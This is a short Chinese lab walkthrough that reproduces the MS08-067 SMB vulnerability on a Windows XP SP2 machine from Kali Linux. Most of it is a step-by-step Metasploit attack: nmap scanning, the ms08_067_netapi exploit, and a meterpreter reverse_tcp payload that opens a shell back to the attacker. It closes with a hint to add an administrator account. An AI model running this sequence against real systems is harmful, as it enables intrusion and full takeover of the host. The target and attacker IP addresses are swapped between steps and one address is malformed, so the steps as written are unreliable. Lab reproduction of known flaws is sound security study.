MS08_067漏洞
MS08_067漏洞也是在445端口上被攻击者利用,MS17_010利用的是445端口上的网络共享和远程文件的服务,而这次的MS08_067利用的是在远程调用过程中,函数出现的逻辑性错误,从而造成缓冲区溢出。
1.漏洞复现
1.1 复现环境
靶机:windows xp sp2 IP:192.168.1.133
攻击机:kali-linux-2020.2 IP:192.168.1.131
1.2 复现流程
- sudo msfconsole
1.3 扫描目标靶机
- nmap -sS 192.168.1.131
通过nmap 扫描发现 目标靶机的445端口处于打开状态,而ms08_067针对的就是445端口上的远程调用过程。
1.4 搜索漏洞
- search ms08_067
1.5 使用ms08_067漏洞
- use exploit/windows/smb/ms08_067_netapi
- show options
设置RHOSTS 192.1681.131
1.6 选择目标系统
- set RHOSTS 192.168.1.131
- show targets
- set target 10
根据目标靶机的系统选择target,我的目标靶机是windows xp sp2 所以选择 target 10
1.7 设置payload
- use payload/windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.133
- show options
选择payload 来处理攻击后与靶机通信的问题,这里选择的是反向tcp连接,攻击后目标靶机会向攻击机发送连接请求
1.8 攻击靶机
- exploit
攻击结果已经获取到了目标系统的shell,提权可以使用windows命令 添加用户并将用户添加进管理员组。